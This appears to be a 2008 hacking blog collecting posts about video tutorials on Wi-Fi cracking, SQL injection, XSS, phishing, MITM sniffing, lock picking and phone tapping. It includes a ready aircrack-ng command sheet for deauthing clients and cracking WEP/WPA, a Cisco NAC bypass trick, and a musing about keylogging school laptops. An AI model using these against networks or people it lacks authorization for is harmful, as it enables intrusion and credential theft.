Hacking Mode Trick and Video Download

Wireless Hacking - Cracking WEP

2008-12-05T20:55:00.000-08:00

The second episode of Full Disclosure is now released. This episode includes how to crack WEP encryption, and why it is so easy to crack. The shownote are published in the wireless hacking section of the forums.

Download video here

Wireless Hacking - DeAuth

2008-12-05T20:54:00.000-08:00

The third episode of Full Disclosure is a short one; however, it is a necessary step in cracking WPA-PSK which will be our next video. Basically this attack just disconnects all the users on a wireless network. The attacker does not need to know the WEP or WPA key or be connect to the network. This attack is illegal in many states, so this video is for education reasons only.

Download video here

Lock Picking - Bump Key

2008-12-05T20:53:00.000-08:00

This is the first of our Lock picking series. In this episode we describe how to make and use a bump key to quickly unlock most residential grade locks.

Download video here (Right Click -> Save Link as)
Video Shownotes here

Phone Phreaking - Beige Box

2008-12-05T20:51:00.000-08:00

This episode of Full Disclosure we are demonstrating how to tap a phone line with the old school Beige Box! We are planning to have many Phone Phreaking (telephone hacking) episodes like Sniffing VOIP, Hacking COCOT, and Red Boxing to name a few.

Download video here (Right Click -> Save Link as)

Phone Phreaking/Network Hacking - Sniffing VoIP

2008-12-05T20:50:00.000-08:00

Our seventh episode is a mix between Phone Phreaking and Network Hacking. In this episode we demonstrate how to sniff Voice Over IP conversations, which basically means how to tap an internet phone. We thought that this would be a good video to follow the beige box.

Download video here (Rig

Lock Picking - DIY Padlock Shims

2008-12-05T20:46:00.000-08:00

This is our second video in our Lock picking series. In this video we explain how to make and use Padlock Shims. Padlock Shims are used to unlock spring latch Padlocks.

Download video here (Right Click -> Save Link as)

Lock Picking - Mult-Disc Combo Locks

2008-12-05T20:45:00.000-08:00

This is our third video in our Lock Picking series; after this video we will return to computer hacking videos for a while. In this video we demonstrate how to unlock the Master Lock 653D, Targus Defcon CL, and the Master Lock 175. The different methods shown in this video to unlock these three locks will help you not only unlock these locks; but also, help you develop your own way to crack other mult-disc combo locks that you may come across.

Download video here (Right Click -> Save Link as)

Local Privilege Escalation Vulnerability in Cisco VPN Client

2008-12-05T20:43:00.000-08:00

Recently a local privilege escalation vulnerability was found in Cisco’s VPN Client. When Cisco VPN Client is installed, a windows service “Cisco Systems, Inc. VPN Service” is created. The service runs the binary C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe as Local System. Therefore, if you replace cvpnd.exe with another executable, then that program will be ran at startup with root privileges! I fond this vulnerability interesting because it is used at my college to authenticate students when they connect to the wireless network. For that reason, almost every student with a laptop has this software installed, and students are allowed to borrow school laptops from the student center to use the wireless internet. Consequently, anyone could borrow a laptop, gain root access thought the vulnerability, and install a keylogger that sends every keystroke to the attacker’s email! Its been 5 days seen this vulnerability was discovered, and Cisco has already issued a patched version. However, how long will it take for the school to update all their computers? This is just another reason why you should be careful when using school computers!

Video Demonstration: (shows how to gain root access and change the Admin password with this vulnerability)

Hacking Basics - MD5

2008-12-05T20:41:00.000-08:00

In this episode of Full Disclosure we will demonstrate how to crack MD5 password hashes. MD5 (Message-Digest algorithm 5) is a hash function commonly used by websites to encrypt passwords. MD5 is a one-way hash; therefore, to crack the password you most try every possible dictionary word and if that does not work, every possible letter/number/symbol combination. The programs we use to crack the passwords are Cain and MDCrack-NG.

Download video here (Right Click -> Save Link as)

Website Hacking - Sql Injection

2008-12-05T20:39:00.000-08:00

For Infinity Exists Full Disclosure’s first Website Hacking episode, we demonstrate how to exploit a security vulnerability occurring in a website’s database to extract password hashes. Sql (Structured Query Language) is a computer language designed for the retrieval and management of data in a system’s database. The Attack, known as Sql Injection, manipulates Sql statements before they are sent to the Sql Server, allowing the Attacker to create, change, or retrieve data stored in the database. Sql Injection is a hard concept to understand, so we made a video that encompasses all our knowledge on the subject to make it easier for our viewers to grasp.

Download video here (Right Click -> Save Link as)

Hacking Basics - Backtrack

2008-12-05T20:28:00.000-08:00

On the forums, there has been many questions concerning Backtrack. Therefore, we decided to make a video that tries to answer as many as these question as possible. In this episode we cover: Where to get Backtrack 2, How to burn an .ISO file, How to boot Backtrack 2, How to login, and start the GUI interface. Also, we illustrate basic Linux commands, and how to set up your Network Interfaces.

Download video here (Right Click -> Save Link as)

How to use Intel Pro/Wireless 3945ABG in Backtrack 2

2008-12-05T20:21:00.001-08:00

The Intel Pro/Wireless 3945ABG (IPW3945) is a popular wireless card that is build-in many laptops. However, the drivers included in Backtrack 2 do not allow you to do packet injection. To fix this problem you need to install the IPWRAW drivers. The easy way to do this is to use Backtrack 2 module. A module adds additional components to Backtrack 2. To add a module, you copy the .LZM file into the modules folder in the BT2 .ISO. After adding the IPWRAW module to the BT2 .ISO, boot up Backtrack and click the “IPW3945 RAW load.sh” script on the desktop to install the IPWRAW Drivers. After the drivers are installed your wireless card will be lock in monitor mode, and you will be able to do packet injection with aireplay-ng. If you want to put your wireless card in managed mode and connect to a wireless network click the “IPW3945 load.sh” script on the desktop. That script will load the default IPW3945 Drivers.

Video Demonstration

Download IPWRAW Module Here
Discuss Here

Credit:
IPWRAW package made by: -~operator~-
Module made by: Genius

How to use Intel Pro/Wireless 3945ABG in Backtrack 2

2008-12-05T20:21:00.000-08:00

Video Demonstration

Download IPWRAW Module Here
Discuss Here

Credit:
IPWRAW package made by: -~operator~-
Module made by: Genius

Sql Injection Challenge!

2008-12-05T20:18:00.000-08:00

I’m proud to announce the first Infinity Exists’ Hacking Challenge! The challenge is to find a Sql Injection flaw in our forums, and exploit it to extract password hashes. The first person to complete this challenge will receive a free Infinity Exists T-shirt. The Sql Injection vulnerability is hidden deep in Infinity Exists’ forums, and will be much harder to find then the vulnerability demonstrated in Full Disclosure Episode 11. Tips to help you get started:

Watch Full Disclosure Episode 11!
Download Wp-Forums Source Code
The variable that is used to manipulate the Sql Statement is a POST variable.

Good Luck!
—————————————————————————————————————————–
Update!
marcel.romard and esc both won Infinity Exists’ Sql Injection Challenge!! Marcel.romard found the Sql injection flaw in the forum’s search that this challenge was based around. Esc found a Sql Injection flaw that we were unaware of in the forum’s RSS feed. Congrats to both of you!

Sql Injection Challenge How-to

2008-12-05T20:14:00.000-08:00

The Sql Injection Challenge has already been completed, so here is a video demonstration on how to find this Sql Injection flaw and exploited it to extract password hashes. In this video I use a firefox plugin ‘Data Tamper’ that can be download here

Full Size Video
Download Here

SIUC’s Network

2008-12-05T20:11:00.000-08:00

I currently attend Southern Illinois University at Carbondale, and I am taking Digital Circuit Design with Dr. Weng who also teaches Network Processing Systems Design. Today in class he invited all his students to go a tour of SIUC’s computer network with his Network Processing Systems class. Of course I took up his often because it is not every day a regular student can walk into the core networking room and server mainframe of a large University. Basically, the network is system up on a three layer infrastructure (Core Layer, Distribution Layer, Access Layer). At the Access Layer (which is the layer that provides network access to client computers) the University uses Cisco Catalyst 2950 switches. Those switches are connected via cross-over cable to the Distribution Switch which is a Cisco Catalyst 3524. In turn, the Distribution switch connects via fiber wire to the Core Switch which is a Cisco Catalyst 6509. The entire can network runs at 1 Gigabyte; however, the internet bandwidth is capped at 300 Mb! Furthermore, only 90 Mb of bandwidth is dedicated to the Residence Halls!! All the Core Switches goto the student center where the internet point of entry is located. Also, internet traffic is filtered through a SourceFire firewall. Some more interesting networking facts: SIUC has 9 Wireless AP (I believe) which are managed by a Cisco Wireless LAN Controller, for access control they use Cisco 1111, for VPN they use Cisco VPN Concentrator 3000, and for their servers they use Sun System SunFire. A interesting security fact is that they only use SSH to configure switches remotely because the web interface has security issues. Lastly, you probably noticed that most of their networking devices are Cisco this is for compatibility reasons, they had problems in the past for using multiple vendors. Well thats about it, hope you enjoyed hearing about SIUC’s Network.

Typical Network Layout of a SIUC Building:

My Dorm’s Network Layout:

Infinity Exists Featured On 60 Minutes

2008-12-05T20:08:00.000-08:00

CBS’s 60 Minutes ran a segment on internet insecurities and they showed the ease of finding tutorials on youtube to exploit them. They chose our video on cracking WEP to demonstrate and showed a short clip of it. The segment is up on the CBS website and you can check it out here. Thank you CBS for the free publicity!
—————————————————————————————————————————– Update - Live Stream

Website Hacking - XSS

2008-12-05T19:03:00.000-08:00

In this episode of Full Disclosure we are explaining the website attack known as Cross-Site Scripting (XSS). Cross-Site Scripting is a type of security vulnerability that affects web applications that do not sanitize user input properly. This kind of vulnerability allows an “attacker” to inject HTML or client side script like JavaScript into the website. Cross-Site Scripting is most commonly used to steal cookies. Cookies are used for authenticating, tracking, and maintaining specific information about users; therefore, by stealing a user’s cookies an attacker could bypass the website’s access control. There are three types of XSS attacks: Persistent, Non-Persistent, and DOM-Based. In this episode we will cover Persistent and Non-Persistent Cross-Site Scripting attacks.

Download video here (Right Click -> Save Link as)

The 60 Minutes Effect

2008-12-05T18:27:00.000-08:00

As most of you already know, Infinity Exists’ Full Disclosure Ep. 2 Wep Cracking was featured on CBS’s 60 Minutes “High-Tech Heist” for about 10 seconds. Those few seconds on Nation Television gave us about 40,000 hits on YouTube, and about 750 unique hits on InfinityExists.com. Weeks after the 60 minutes episode aired Infinity Exists is still getting an average of 300 unique hits a day. This is pretty good compared to our 200 hit average before.

However, 60 Minutes brought Infinity Exists to the attention of a few unwanted people. For Example:

People that do not understand what it is to be a hacker, just simply think we are criminals. A Hacker truly is a computer enthusiast that enjoys exploring various computer systems in the pursuit to gain more knowledge. A hacker’s goal is never to harm anyone or anything as the media would like you to believe. The goal of Infinity Exists’ video series Full Disclosure is to inform people about specific security flaws. If there was no one to disclose this information to the general public then everyone would still being using insecure technology and would be at the mercy of criminal crackers.

Exploit Hacking

2008-12-05T18:26:00.000-08:00

Since Infinity Exists hasn’t had time to release a new episode, I decided to revamp a two part series, Exploit Hacking and Exploit Hacking 2 - Privilege Escalation, that I made a year before Infinity Exists was created. It may be a little dated, but it provides great information on how a hacker can find an vulnerability on a remote computer and exploit it to gain remote access. Also, the video shows how a hacker can raise their privileges on the remote machine to administrator. I added text throughout the video to make it easier to understand. Furthermore, Infinity Exists plans to do a more up-to-date and more detailed series of episodes on “exploit hacking.”

Full Scale Video Here
Download Here

USB Worm (Jamesgo.dll)

2008-12-05T18:24:00.000-08:00

The other day my computer was infected by a USB Worm known as Jamesgo.dll. I received the virus when I inserted my girlfriend’s USB thumb drive. The worm modified the autorun.inf file on the thumb drive, so it was able to automatically transfer itself to all my hard disk drives (Click Here to view autorun.inf). There is little information on the internet about this virus, so I had to figure out my own way to remove it. By analyzing the autorun.inf (which the virus cleverly changed to a system hidden file, and later I found out that it modified the registry so system hidden files are never displayed) I disclovered that each drive contains the Visual Basic Script, test.vbs (Click Here to view Test.vbs). Basically what the file does is copies test.bat, test.reg, autorun.inf, autorun.ico, and itself to every hard disk in the system. Also, it runs every 60 seconds, so if you delete it from one drive in 60 seconds it will recopy itself from a different drive. Futhermore, the test.reg simply edits the registry so test.bat runs on start up and prevents system hidden files from being displayed. Test.bat runs the VB script and changes the files to system,hidden,achieved, and read-only (Click Here to view Test.reg and Click Here to view Test.bat). To remove the virus I crafted a batch file changes all the test files and autorun to normal files (attrib -s -h -r test.*, attrib -s -h -r autorun.*), and then deleted them. Since the batch file can delete all the files quickly it does not have a chance to recopy itself to all the disk drives. Also, I manually removed all entires of test.bat from the registry (Click Here to view Fix)

To prevent a USB Worm from infecting your computer:
1) Goto Start -> Run
2) Type “gpedit.msc” (This is the group policies editor)
3) Click “Administrative Templates” under Computer Configuration
4) Then click “System”
5) Select “Turn off Autoplay”
6) Set it to “Enable” and choose to “Turn off Autoplay on All Drives”

In conclusion, the Jamesgo.dll USB Worm is not a risk for your computer, but it is really annoying! Also, it is a perfect example on how easy it is to create a Worm for travels though removal media. If you want to mess around and modify the Jamesgo.dll script you can download it here. If you want to learn more on how to use Autorun and Batch files to create a “Auto Hacking USB Thumb Drive” go here.

Interesting Note: The Jamesgo.dll USB Worm was created in the Philippines which is stated in test.vbs, and the Thumb Drive that infected my computer was purchased in the Philippines and brought back to the US by my girlfriend’s mother.

Staying Secure - SSH Tunnel

2008-12-05T11:12:00.000-08:00

The wait is finally over! This new episode of Full Disclosure shows you how to use a SSH Tunnel to secure your data when you are on an untrusted LAN (ex. Coffee Shop, School’s network, or Defcon). Furthermore, you can use the SSH Tunnel to bypass the LAN’s internet filters. The SSH tunnel protocol works by encapsulates your data into an encrypted payload and transmitting it to the SSH Server which is setup on a trusted LAN.

Live Stream Here
Download Here

Links:
OpenSSH for Windows, Putty, Proxifier

Wireless Hacking - Cracking WPA

2008-12-05T11:06:00.000-08:00

This episode of Full Disclosure illustrates the progress of Cracking weak WPA Preshared Keys. Before you can crack the Preshared Key you must capture the four way handshake between the Access Point and a client; to accomplish this you must force the client to reconnect to the AP with the DeAuthentication attack we showed in episode 3. If you are using the Linksys WUSB54GC you will have to update your drivers to RaLink RT73 USB Enhanced Driver. In this episode we show you how to do this, and I also made a Backtrack module to automate the process. The module works in the same way as the IPWRAW Module for the Intel Pro/Wireless 3945ABG card, so you can watch that Vblog if you are having troubles.

Live Stream Here
Download Here

Download RT73 Module Here
Watch IPWRAW Vblog Here

Singing Tesla Coil

2008-12-05T11:04:00.000-08:00

This weekend was UIUC’s annual Engineer Open House, and last night there was a Singing Tesla Coil show. The Tesla coils were built by Steve Ward, a EE student at UIUC. “Steven has developed Tesla Coils with high levels of control allowing audio modulation of their lightning-like display. Interfacing the Continuum Fingerboard with this technology will generate a musically expressive and highly energetic, multi-voiced performace” (EOH Exhibit Guide).

Full Scale Video Here
Download Here

McAfee SiteAdvisor

2008-12-05T11:01:00.000-08:00

An anonymous viewer brought to my attention that McAfee’s so called “SiteAdvisor” had labeled Infinityexists.com with the big evil red X

It turns out that McAfee SiteAdvisor scanned Infinity Exists and found the Jamesgo.dll Worm, which I uploaded so you guys can see how it works. Not only is the virus zipped to prevent anyone from accidentally running it, but also, there is an explanation on how to remove the virus in the blog post.

(I have to agree with the Nuisance ‘O Meter. Jamesgo is definitely an 8!)

Don’t get my wrong, I think it is a good idea for McAfee to try to inform non-techie computers users that those free screensavers are going to mess up their computer. I just think McAfee should take into account the content of the website instead of just blindly scanning the internet for viruses. Now people interested in computer hacking will be disinclined to visit Infinity Exists because they’ll see this:

Well anyways, that my rant on McAfee SiteAdvisor

Tapping a 66 Block Telephone Network Interface

2008-12-05T11:00:00.000-08:00

Awhile ago I was asked to rewiring a company’s 66 Block, a type of punchdown block used to connect sets of wires in a telephone system, because they wanted to replace their plain old telephone service (POTS) with multiple VoIP telephone lines. I had little knowledge on the 66 Block before doing this job, so I got out my trusty Beige Box to figure out how it was wired. Here’s a short video on how to tap a 66 Block. (Watch Episode 6 if you need help making a Beige Box)

Full Scale Video Here
Download Here

Triple Boot - Windows, Backtrack, & Ubuntu

2008-12-05T10:58:00.000-08:00

For episode 17, we demonstrate how to triple boot a computer with Windows, Backtrack, and Ubuntu. Nox and I go through the process of setting up the various disk partitions, installing Backtrack and Ubuntu to different partitions, and how to configure your computer to boot between each of the Operating Systems. Hopefully, this episode will give you guys insight on how to go about multibooting your computer with several different OSs.

Live Stream Here
Download Here

Download Backtrack
Download Ubuntu

Dual Boot - Windows & Backtrack

2008-12-05T10:57:00.001-08:00

We said we would release a Vblog on how to Dual boot Windows and Backtrack so here it is. The process is slightly different, there is not need for an extended partition because you only need four primary partitions, and we use Lilo for the boot loader. Since we aren’t installing Ubuntu we have to manually create and configure the linux swap partition. Also, we have to manually configure Lilo; however, this allows us to change the Splash image when your computer starts.

Full Scale Video Here
Download Here

Local Password Cracking

2008-12-05T10:56:00.001-08:00

In this addition of Full Disclosure, Nox and I show you how to crack local Linux and Window’s passwords. Furthermore, we explain how to reset and restore Linux or Window’s password for temporary access to a computer. There are different trade-offs for each method of bypassing local passwords. Cracking a password can take a long time, but knowing the password may help you gain access to other computers and programs. Reseting and Restoring a password is quick because you don’t need to know the password, but you will have to repeat this method every time you want access to the computer.

Live Stream Here
Download Here

Ophcrack
Cain

Introduction

2008-12-05T10:54:00.000-08:00

Infinity Exists Underground is a new video series based completely on viewer submissions. If you have an educational video on hacking, lock picking, modding, etc. send an email explaining what your video is about to underground@infinityexists.com. Nox and I will review the emails and if it sounds like a good informative video we will give you access to the video upload page so you can submit your video. We may edit your video slightly to make it clearer, but you will get credit for creating the video. Also, you can remain anonymous if you are making a questionable video. We hope to get many viewer submissions so that we can get more content on the site and also get you guys more involved.

Full Scale Video Here
Download Here

Lock Picking Basics

2008-12-05T10:53:00.000-08:00

Our 19th video is a continuation of our lock picking series. In this episode, we explain how to pick a deadbolt lock using the Lifter Picking method.

Live Stream here
Download video here

Email Spoofing

2008-12-05T10:51:00.000-08:00

The first Underground video explains how to send fake emails a.k.a. Email Spoofing. This video, submitted by Crash Overron, covers two methods of email spoofing. The first and older method is connecting directly to the SMTP server with Telnet; however, this method is usually blocked by the email provider. The second method, utilizes the Mail() function in php. Full Scale Video Here
Download Here

Download Email_Spoof.php
(Right Click -> Save As Email_Spoof.php)

Metasploit Autopwn

2008-12-05T10:50:00.000-08:00

In this Underground Video, Copy explains how to use Metasploit’s Autopwn. The Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. Autopwn is a tool in Metasploit Framework version 3 that automates the exploitation process. Copy demonstrates how to use Autopwn in both Backtrack 2 and Backtrack 3. Full Scale Video Here
Download Here

The Metasploit Project
For more information on the Metasploit Framework check out my Exploit Hacking video.

Recovering an Acer Computer

2008-12-05T10:48:00.000-08:00

Last Thursday, my Acer Travelmate laptop crapped out on me and stopped booting Windows XP. I tried everything to fix it: booting into safe mode, using Windows recovery console to fix the boot.ini, fixing the corrupted partition boot sector with Fixboot, and fixing the Master boot record with Fixmdr. I even tried to reinstall windows, but it still wouldn’t boot! So I decided I would just backup all my stuff with a liveCD, format the drive, and use the recovery cd to start all over. Guess what? Acer doesn’t ship their laptops with a Recovery CD; they require you have to burn it yourself when you first get the computer, and of course I was way too lazy to do that. Well after some research I found out there is a hidden recovery partition that the Acer repair people use to fix your computer. If you are having the same problem as me, heres how I accessed the hidden partition and recovered my computer.

1. Boot your computer with the Backtrack liveCD (I used BT2 because it was the only thing I had off hand)
2. Backtrack will automatically mount the hidden drive (sda1). Navigate to it in the /mnt/sda1 folder.
3. Copy mbrwrwin.exe and rtmbr.bin from the /mnt/sda1 folder to the /mnt/sda2 folder (your C drive).
4. Next, you need to run the mbrwrwin install rtmbr.bin command. You can do this a couple different ways: You can use the Windows Recovery Console to run the command, or use a Windows LiveCD like BartPE (http://www.nu2.nu/pebuilder/). I used BartPE because I already tried to re-install windows and I couldn’t access the recovery console because I wasn’t able to set an Administrator password.
5. Restart your computer, and press Alt-F10 at the Acer splash screen. This will bring you to the Acer eRecovery on the hidden partition, and all you have to do is follow the directions to restore the factory settings. (If you can’t access the eRecovery make sure d2d recovery is enabled in BIOS. You can access the BIOS by pressing F2 at the Acer splash screen).
6. After your computer is restored, burn the damn recovery cd so you don’t have to do this next time!!!

For more information check out:
http://forum.notebookreview.com/showthread.php?t=175697
http://forum.notebookreview.com/showthread.php?t=11476

Application Patching

2008-12-05T10:47:00.000-08:00

Crash Overron’s second Underground video explains how to use Ollydbg to manipulate a simple program. OllyDbg is a debugger that analyzes binary code. Not only does Olly allow you to step through an executable’s assembly code, but also, it can trace registers, recognize procedures, API calls, switches, tables, constants and strings. Crash Overron utilizes a feature in Olly to locate a referenced text string that is displayed when an invalid serial key is entered. Once the string is located, he can find the compare statement that checks the user’s serial key, and change the flow of the program so that his serial key is accepted. Full Scale Video Here
Download Here

Download Ollydgb
Download Application

Ettercap

2008-12-05T10:46:00.000-08:00

For this episode of Full Disclosure, we illustrate the many features of Ettercap. Ettercap is a program designed to sniff passwords on a LAN. It can recognize several different packets that contain passwords including Http, Telnet, Ftp, Pop, Rlogin, SSH1, ICQ, SMB, MySql, NNTP, X11, IRC, IMAP, VNC, SNMP, MSN, YMSG, etc. Furthermore, Ettercap can utilize Man in the Middle Attacks to hijack packets and redirect them to the attacker computer allowing it to extract passwords. In this episode, we show you how to use Arp Poisoning, DHCP Spoofing, and Port Stealing MITM Attacks and explain how they work. Also, we explain how to configure Ettercap to sniff encrypted passwords over the Secure Sock Layer (SSL and HTTPS). Moreover, Ettercap can be easily programmed to modify network traffic with the use of Filters. We demonstrate how to make many different Ettercap Filters. Ettercap comes with numerous plugins to advance Ettercap’s abilities; we explain how to use the Check Poison, Re-Poison, DNS Spoofing, Isolate, DoS Attack, Find IP, Gateway Discover, Search Promisc, Arp Cop, and Scan Poisoners Plugins. Lastly, we demonstrate how to use Ettercap’s Passive OS Fingerprinting feature. Ettercap supports passive dissection of many protocols allowing it to identify a host’s Operating System and Services.

Live Stream Here
Download Here

This Full Disclosure episode is very lengthy, almost 50 minutes, so if you have any questions feel free to ask them on the forums

Download Ettercap (Linux)
Download Ettercap (Windows)

Filters:
Irongeek’s Image Altering Filter
Patchy’s Wordpress Filter
Patchy’s Myspace Filter

Windows SMB Relay Exploit

2008-12-05T10:44:00.000-08:00

In this Underground video, Overide demonstrates how to obtain root access on a fully patched Windows XP SP3 Machine. He exploits a flaw in Windows Server Message Block (SMB) which is used to provide shared access to files between hosts on a network. Overide utilizes the Metasploits Framework to run the exploit. It works by relaying a SMB authentication request to another host which provides Metasploit with a authenticated SMB session, and if the user is an administrator, Metasploits will be able to execute code on the target computer such as a reverse shell. For this exploit to run, the target computer must try to authenticate to Metasploit. Overide forces the target computer to perform a SMB authentication attempt by using a Ettercap Filter. Full Scale Video Here
Download Here
Download Ettercap Filter Here

Beer Pong Table

2008-12-05T10:43:00.001-08:00

The last few days I’ve been helping my friend Charlie construct his Illinois State University (ISU) Beer Pong Table. The legs and supports of the table are made from his roommate Brandon’s hockey sticks, and the table top is made of plywood with a 1/8″ sheet of Acrylic on top. Our friend Tyler etched ISU’s mascot, Red Bird, into the Acrylic; it was done free-hand with a dremel (Compare his etching to image). Tyler also did the text on the table: “ISU” and ” What you call Addiction … We call Dedication”. I did the LED array and the wiring; when the LEDs are lit, the light catches the etching in the acrylic. The LED controller I made allows you to switch between the LEDs being constantly on or controlled by an audio input. However, the LEDs we used are only lit at a specific voltage, so it doesn’t work very well. Full Scale Video Here
Download Here
Pre-Amp Schematic

Beer Pong Table

2008-12-05T10:43:00.000-08:00

XSS Tunnel

2008-12-05T10:42:00.000-08:00

XSS Shell is a cross-site scripting backdoor into the victim’s browser which enables an attacker to issue commands and receive responses. During a normal XSS attack an attacker only has one chance to control a victim’s browser; however, the XSS Shell keeps the connection between the attacker and the victim open to allow the attacker to continuously manipulate the victim’s browser. XSS Shell works by setting up an XSS Channel, an AJAX application embedded into the victim’s browser, that can obtain commands and send back responses. To enable the XSS Shell an attacker needs to inject the XSS Shell’s Javascript reference by utilizing a XSS flaw on a website. Once the victim’s browser is infected with the XSS Shell and the XSS Channel is created, the attacker can issue instructions to the infected browser. Also, the Attacker can use a XSS Tunnel to transfer HTTP traffic through the XSS Channel and the victim’s browser; in turn, exploiting the victim’s credentials to bypass authentications and IP Restrictions. The XSS Tunnel is a HTTP Proxy that sits on an attacker’s computer, and any tool that is configured to use it will tunnel its traffic through the XSS Channel.

Live Stream Here
Download Here

Download XSS Shell and Tunnel

Password Phishing

2008-12-05T10:38:00.001-08:00

Phishing is a method of obtaining sensitive information such as usernames and passwords by pretending to be a trusted website. Tehdead shows us a variety of password phishing techniques that enable an attacker to trick a user into giving up their login information. The first step is to create a fake login identical to the login on the trusted website. In order to not raise suspicion, Tehdead explains two methods to capture the victim’s password and then transfer them to the real website. One method is to sumbit the information to a php page that is disguised as a pop-up advertisment, and the other is to send the username and password to a simular php page that is contained in an iframe. Lastly, Tehdead describes how to use link manipulation with BBcode to social engineer a victim into going to the fraudulent website. Full Scale Video Here
Download Here

Bypass Cisco Clean Access & Cisco NAC Appliance

2008-12-05T10:34:00.000-08:00

Cisco NAC Appliance (formerly Cisco Clean Access) is a Network Admission Control (NAC) product that is uses to enforce security policy on computers seeking to access network resources. Therefore, an administrator can force users to comply to a policy that requires the user to install or remove programs. For example, a university I previously attended required students to install McAfee Antivirus Software and remove Peer-to-Peer programs before they were allowed to access the internet.

To bypass Cisco Clean Access a user can simply change their browser’s User Agent to an Operating System that does not require this program [ex. Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.8) Gecko/20050511]. An easy way to change your User Agent in Firefox is to download User Agent Switcher.

With Cisco NAC Appliance, Cisco added additional detection mechanisms such as TCP fingerprinting and JavaScript OS detection, so the User Agent trick will not work. However, by changing the default parameters of the Windows TCP/IP stack the user can still connect to the network without running any host-based checks. You can do this with Kevin.

Video Demonstration:

Full Scale Video Here
Download Here

Manipulating Windows User Accounts

2008-12-05T10:14:00.001-08:00

Xauthzx’s Underground video describes how to Create, Delete, and Manipulate Windows user accounts from the command line. Although it is a relatively simple procedure, knowing how to use the Windows net command can be very helpful in many situations.

User Commands
net user – Display User Accounts
net user [Username] * – Change a User’s Password
net user [Username] /del – Delete a User
net user [Username] /add – Add a User
net localgroup – Display Local Groups
net localgroup [Group] [Username] /add – Add User to Local Group

Other Useful Commands
net start – Display Services
net start [Service] – Start Service
net stop [Service] – Stop Service
net share – Manage Shared Folders
net view – Display Network Computers
net view \\[Computer Name] - Display Network Computer’s Shared Folders
net use * \\[Computer Name]\[Shared Folder] – Mount Network Shared Folder

Full Scale Video Here
Download Here

Manipulating Windows User Accounts

2008-12-05T10:14:00.000-08:00

describes how to Create, Delete, and Manipulate Windows user accounts from the command line. Although it is a relatively simple procedure, knowing how to use the Windows net command can be very helpful in many situations.
User Commands
net user – Display User Accounts
net user [Username] * – Change a User’s Password
net user [Username] /del – Delete a User
net user [Username] /add – Add a User
net localgroup – Display Local Groups
net localgroup [Group] [Username] /add – Add User to Local Group

Other Useful Commands
net start – Display Services
net start [Service] – Start Service
net stop [Service] – Stop Service
net share – Manage Shared Folders
net view – Display Network Computers
net view \\[Computer Name] - Display Network Computer’s Shared Folders

Episode 12 - Hacking Basics - Backtrack

2008-12-05T10:10:00.001-08:00

Download video here (Right Click -> Save Link as)

List of compatible adapters BackTrack

2008-12-05T10:09:00.001-08:00

PCMCIA/Cardbus/Express Card
Airlink AWLC4030 Chipset Atheros
Belkin F5D8071 Chipset Atheros
D-Link DWA-643 Chipset Atheros
D-Link DWL-650 Chipset Prism 2.5
D-Link DWL-G630 C2 v3.01 Chipset Atheros
D-Link DWL-G630 E1 Chipset Ralink
D-Link DWL-G650 C3, C4, B5 Chipset Atheros
Linksys WPC55AG v1.2 Chipset Atheros
MSI CB54G2 Chipset Ralink
Netgear WAG511 Chipset Atheros
Netgear WG511T Chipset Atheros
Netgear WG511U Chipset Atheros
Proxim 8470-WD Chipset Atheros
Senao NL-2511 CD PLUS EXT Chipset Prism 2.5
TP-Link TL-WN610G Chipset Atheros
TrendNet TEW-441PC
Ubiquiti SRC Chipset Atheros

PCI/MiniPCI/MiniPCI Express
ASUS WL-138G V2 Chipset Broadcom
ASUS WL-138gE Chipset Broadcom
Canyon CN-WF511 Chipset rt61
D-Link DWL-G550 Chipset Atheros
Linksys WMP54G v4 Chipset Ralink
Linksys WMP54G-UK v4.1 Chipset Ralink
MSI PC54G2 Chipset Ralink
Netgear WG311T Chipset Atheros
Netgear WPN311 Chipset Atheros
Thinkpad 11a/b/g Chipset Atheros
TP-Link TL-WN650G Chipset Atheros
TP-Link TL-WN651G Chipset Atheros
Trendnet TEW-443PI A1 1R Chipset Atheros

USB
Asus WL-167g v2 Chipset Ralink RT73
Airlink AWLL3026 Chipset Zydas zd1211
Alfa AWUS036E Chipset RTL8187L
Alfa AWUS036H Chipset rtl8187
Alfa AWUS036S Chipset Ralink rt73
Digitus DN-7003GS Chipset RTL8187L
D-Link DWL-G122 B1 Chipset Ralink RT2570
D-Link DWL-G122 C1 Chipset Ralink RT73
D-Link WUA-1340 Chipset Ralink RT73
Edimax EW-7318USg Hawking HWUG1 Chipset Ralink rt73
Linksys WUSB54G v4 Chipset Ralink rt2570
Linksys WUSB54GC Chipset Ralink RT73
Netgear WG111 v1 Chipset PrismGT SoftMAC
Netgear WG111 v2 Chipset RTL8187L
TP-Link TL-WN321G Chipset Ralink RT73
Trendnet TEW-429UB C1 Chipset Zydas zd1211b
ZyXEL AG-225H Chipset Zydas zd1211
ZyXEL G-202 Chipset Zydas zd1211b

Banyak yang menyarankan sebaiknya menggunakan Chipset Atheros, BackTrack bakalan lebih jantan ...

Perintah untuk Hacking Wi Fi (BackTrack)

2008-12-05T10:07:00.000-08:00

luthfil:
a. Mematikan seluruh Client

aireplay-ng --deauth 10 -c FF:FF:FF:FF:FF:FF -a [AP MAC] ath0

b. WEP crack

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
new console
airodump-ng --channel [x] --bssid [x] -w [hasil] ath0
new console
aireplay-ng --arpreplay -b [AP MAC] -h [Client MAC] ath0
new console
aireplay-ng --deauth 5 -c [Client MAC] -a [AP MAC] ath0
aircrack-ng hasil*.cap
aircrack-ptw hasil-01.cap

c. WPA/WPA2 Crack

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
new console
airodump-ng --channel [x] --bssid [x] -w [hasil] ath0
new console
aireplay-ng --deauth 2 -c [client MAC] -a [Ap MAC] ath0
new console
aircrack-ng -w password.lst [hasil*cap]

Pergunakan dengan arif dan bijak

Hacking tools: A new version of BackTrack helps ethical hackers

2008-12-01T05:59:00.000-08:00

Version 3.0 of BackTrack has been released. BackTrack is a Linux-based distribution dedicated to penetration testing or hacking (depending on how you look at it). It contains more than 300 of the world's most popular open source or freely distributable hacking tools.

I wrote about the first version of BackTrack back in 2006, although it was based off of Whax/Whoppix/Knoppix distributions, which started even earlier. Version 3.0, released on June 19, includes even more hacking tools (unfortunately, it still doesn't include Nessus due to vendor negotiations/restrictions), many fixes bugs, and improved menus.

